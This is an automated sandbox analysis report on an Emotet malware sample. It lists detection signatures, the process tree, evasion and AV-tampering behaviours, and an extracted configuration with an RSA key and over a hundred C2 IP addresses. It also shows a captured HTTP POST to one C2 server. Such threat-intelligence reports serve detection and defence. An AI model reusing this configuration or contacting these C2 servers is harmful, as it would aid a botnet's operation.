Play interactive tour

Edit tour

Analysis Report 2ojdmC51As.exe

Overview

General Information

Sample Name:	2ojdmC51As.exe
Analysis ID:	367934
MD5:	5804d97670dcdfab88ba830682355dad
SHA1:	65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256:	4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

2ojdmC51As.exe (PID: 5356 cmdline: 'C:\Users\user\Desktop\2ojdmC51As.exe' MD5: 5804D97670DCDFAB88BA830682355DAD)

iasrecst.exe (PID: 2964 cmdline: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe MD5: 5804D97670DCDFAB88BA830682355DAD)

svchost.exe (PID: 396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5292 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6048 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5116 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 5456 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5548 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4660 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6492 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6208 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.494960467.0000000000710000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.231317711.0000000002194000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.496587282.0000000002284000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.2ojdmC51As.exe.21e0000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.iasrecst.exe.71052e.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.iasrecst.exe.71279e.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.2ojdmC51As.exe.60279e.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.iasrecst.exe.71052e.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.2ojdmC51As.exe.60052e.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.iasrecst.exe.71279e.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.iasrecst.exe.22c0000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.2ojdmC51As.exe.60279e.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.2ojdmC51As.exe.60052e.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.2ojdmC51As.exe.21e0000.3.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 2ojdmC51As.exe	Virustotal: Detection: 76%	Perma Link
Source: 2ojdmC51As.exe	Metadefender: Detection: 67%	Perma Link
Source: 2ojdmC51As.exe	ReversingLabs: Detection: 88%

Machine Learning detection for sample

Show sources

Source: 2ojdmC51As.exe

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C2290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,	1_2_022C2290
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,	1_2_022C2650
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C1FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptDuplicateHash,	1_2_022C1FB0

Source: 2ojdmC51As.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004182CC FindFirstFileA,FindClose,	0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,	0_2_021E38F0
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_004182CC FindFirstFileA,FindClose,	1_2_004182CC
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	1_2_00417B29
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,	1_2_022C38F0

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 200.116.145.225:443
Source: Malware configuration extractor	IPs: 96.126.101.6:8080
Source: Malware configuration extractor	IPs: 5.196.108.185:8080
Source: Malware configuration extractor	IPs: 167.114.153.111:8080
Source: Malware configuration extractor	IPs: 194.187.133.160:443
Source: Malware configuration extractor	IPs: 98.174.164.72:80
Source: Malware configuration extractor	IPs: 103.86.49.11:8080
Source: Malware configuration extractor	IPs: 78.24.219.147:8080
Source: Malware configuration extractor	IPs: 50.245.107.73:443
Source: Malware configuration extractor	IPs: 110.145.77.103:80
Source: Malware configuration extractor	IPs: 94.200.114.161:80
Source: Malware configuration extractor	IPs: 61.19.246.238:443
Source: Malware configuration extractor	IPs: 194.4.58.192:7080
Source: Malware configuration extractor	IPs: 209.54.13.14:80
Source: Malware configuration extractor	IPs: 102.182.93.220:80
Source: Malware configuration extractor	IPs: 186.70.56.94:443
Source: Malware configuration extractor	IPs: 203.153.216.189:7080
Source: Malware configuration extractor	IPs: 49.50.209.131:80
Source: Malware configuration extractor	IPs: 176.113.52.6:443
Source: Malware configuration extractor	IPs: 62.30.7.67:443
Source: Malware configuration extractor	IPs: 61.76.222.210:80
Source: Malware configuration extractor	IPs: 113.61.66.94:80
Source: Malware configuration extractor	IPs: 157.245.99.39:8080
Source: Malware configuration extractor	IPs: 216.139.123.119:80
Source: Malware configuration extractor	IPs: 184.180.181.202:80
Source: Malware configuration extractor	IPs: 123.142.37.166:80
Source: Malware configuration extractor	IPs: 124.41.215.226:80
Source: Malware configuration extractor	IPs: 119.59.116.21:8080
Source: Malware configuration extractor	IPs: 41.185.28.84:8080
Source: Malware configuration extractor	IPs: 5.39.91.110:7080
Source: Malware configuration extractor	IPs: 220.245.198.194:80
Source: Malware configuration extractor	IPs: 139.162.108.71:8080
Source: Malware configuration extractor	IPs: 75.143.247.51:80
Source: Malware configuration extractor	IPs: 74.214.230.200:80
Source: Malware configuration extractor	IPs: 185.94.252.104:443
Source: Malware configuration extractor	IPs: 208.180.207.205:80
Source: Malware configuration extractor	IPs: 49.3.224.99:8080
Source: Malware configuration extractor	IPs: 93.147.212.206:80
Source: Malware configuration extractor	IPs: 182.208.30.18:443
Source: Malware configuration extractor	IPs: 95.213.236.64:8080
Source: Malware configuration extractor	IPs: 37.187.72.193:8080
Source: Malware configuration extractor	IPs: 59.125.219.109:443
Source: Malware configuration extractor	IPs: 37.179.204.33:80
Source: Malware configuration extractor	IPs: 95.9.5.93:80
Source: Malware configuration extractor	IPs: 168.235.67.138:7080
Source: Malware configuration extractor	IPs: 118.83.154.64:443
Source: Malware configuration extractor	IPs: 121.7.31.214:80
Source: Malware configuration extractor	IPs: 74.208.45.104:8080
Source: Malware configuration extractor	IPs: 87.106.136.232:8080
Source: Malware configuration extractor	IPs: 138.68.87.218:443
Source: Malware configuration extractor	IPs: 62.75.141.82:80
Source: Malware configuration extractor	IPs: 66.76.12.94:8080
Source: Malware configuration extractor	IPs: 202.134.4.216:8080
Source: Malware configuration extractor	IPs: 47.36.140.164:80
Source: Malware configuration extractor	IPs: 110.142.236.207:80
Source: Malware configuration extractor	IPs: 134.209.144.106:443
Source: Malware configuration extractor	IPs: 89.216.122.92:80
Source: Malware configuration extractor	IPs: 75.188.96.231:80
Source: Malware configuration extractor	IPs: 24.179.13.119:80
Source: Malware configuration extractor	IPs: 218.147.193.146:80
Source: Malware configuration extractor	IPs: 174.106.122.139:80
Source: Malware configuration extractor	IPs: 71.15.245.148:8080
Source: Malware configuration extractor	IPs: 104.131.11.150:443
Source: Malware configuration extractor	IPs: 202.141.243.254:443
Source: Malware configuration extractor	IPs: 94.230.70.6:80
Source: Malware configuration extractor	IPs: 24.178.90.49:80
Source: Malware configuration extractor	IPs: 97.82.79.83:80
Source: Malware configuration extractor	IPs: 68.252.26.78:80
Source: Malware configuration extractor	IPs: 173.63.222.65:80
Source: Malware configuration extractor	IPs: 162.241.242.173:8080
Source: Malware configuration extractor	IPs: 79.137.83.50:443
Source: Malware configuration extractor	IPs: 80.241.255.202:8080
Source: Malware configuration extractor	IPs: 120.150.60.189:80
Source: Malware configuration extractor	IPs: 96.245.227.43:80
Source: Malware configuration extractor	IPs: 50.91.114.38:80
Source: Malware configuration extractor	IPs: 83.110.223.58:443
Source: Malware configuration extractor	IPs: 24.230.141.169:80
Source: Malware configuration extractor	IPs: 37.139.21.175:8080
Source: Malware configuration extractor	IPs: 202.134.4.211:8080
Source: Malware configuration extractor	IPs: 190.240.194.77:443
Source: Malware configuration extractor	IPs: 176.111.60.55:8080
Source: Malware configuration extractor	IPs: 123.176.25.234:80
Source: Malware configuration extractor	IPs: 209.141.54.221:7080
Source: Malware configuration extractor	IPs: 115.94.207.99:443
Source: Malware configuration extractor	IPs: 50.35.17.13:80
Source: Malware configuration extractor	IPs: 109.74.5.95:8080
Source: Malware configuration extractor	IPs: 120.150.218.241:443
Source: Malware configuration extractor	IPs: 121.124.124.40:7080
Source: Malware configuration extractor	IPs: 217.20.166.178:7080
Source: Malware configuration extractor	IPs: 108.46.29.236:80
Source: Malware configuration extractor	IPs: 2.58.16.89:8080
Source: Malware configuration extractor	IPs: 85.105.111.166:80
Source: Malware configuration extractor	IPs: 137.59.187.107:8080
Source: Malware configuration extractor	IPs: 139.162.60.124:8080
Source: Malware configuration extractor	IPs: 76.175.162.101:80
Source: Malware configuration extractor	IPs: 139.99.158.11:443
Source: Malware configuration extractor	IPs: 104.131.123.136:443
Source: Malware configuration extractor	IPs: 91.211.88.52:7080
Source: Malware configuration extractor	IPs: 91.146.156.228:80
Source: Malware configuration extractor	IPs: 172.104.97.173:8080
Source: Malware configuration extractor	IPs: 89.121.205.18:80
Source: Malware configuration extractor	IPs: 186.74.215.34:80
Source: Malware configuration extractor	IPs: 61.33.119.226:443
Source: Malware configuration extractor	IPs: 162.241.140.129:8080
Source: Malware configuration extractor	IPs: 130.0.132.242:80
Source: Malware configuration extractor	IPs: 190.108.228.27:443
Source: Malware configuration extractor	IPs: 201.241.127.190:80
Source: Malware configuration extractor	IPs: 87.106.139.101:8080
Source: Malware configuration extractor	IPs: 78.188.106.53:443
Source: Malware configuration extractor	IPs: 188.219.31.12:80
Source: Malware configuration extractor	IPs: 76.171.227.238:80
Source: Malware configuration extractor	IPs: 72.143.73.234:443
Source: Malware configuration extractor	IPs: 62.171.142.179:8080
Source: Malware configuration extractor	IPs: 139.59.60.244:8080
Source: Malware configuration extractor	IPs: 24.137.76.62:80
Source: Malware configuration extractor	IPs: 172.86.188.251:8080
Source: Malware configuration extractor	IPs: 172.91.208.86:80
Source: Malware configuration extractor	IPs: 94.23.237.171:443

Source: unknown

Network traffic detected: IP country count 34

Source: global traffic	TCP traffic: 192.168.2.5:49723 -> 96.126.101.6:8080
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 5.196.108.185:8080
Source: global traffic	TCP traffic: 192.168.2.5:49728 -> 167.114.153.111:8080
Source: global traffic	TCP traffic: 192.168.2.5:49747 -> 103.86.49.11:8080
Source: global traffic	TCP traffic: 192.168.2.5:49748 -> 78.24.219.147:8080

Source: Joe Sandbox View	ASN Name: HOSTER-KZ HOSTER-KZ
Source: Joe Sandbox View	ASN Name: AfrihostZA AfrihostZA

Source: global traffic

HTTP traffic detected: POST /wGf14n07/vS3mZ/aWoW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 5.196.108.185/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------jFClBgacZrwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.196.108.185:8080Content-Length: 4596Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 96.126.101.6
Source: unknown	TCP traffic detected without corresponding DNS query: 96.126.101.6
Source: unknown	TCP traffic detected without corresponding DNS query: 96.126.101.6
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 98.174.164.72
Source: unknown	TCP traffic detected without corresponding DNS query: 98.174.164.72
Source: unknown	TCP traffic detected without corresponding DNS query: 98.174.164.72
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185
Source: unknown	TCP traffic detected without corresponding DNS query: 103.86.49.11
Source: unknown	TCP traffic detected without corresponding DNS query: 103.86.49.11
Source: unknown	TCP traffic detected without corresponding DNS query: 103.86.49.11
Source: unknown	TCP traffic detected without corresponding DNS query: 78.24.219.147
Source: unknown	TCP traffic detected without corresponding DNS query: 78.24.219.147
Source: unknown	TCP traffic detected without corresponding DNS query: 78.24.219.147
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.108.185

Source: svchost.exe, 00000016.00000003.400623292.000001DCAE722000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000016.00000003.400623292.000001DCAE722000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000016.00000003.400383367.000001DCAE767000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema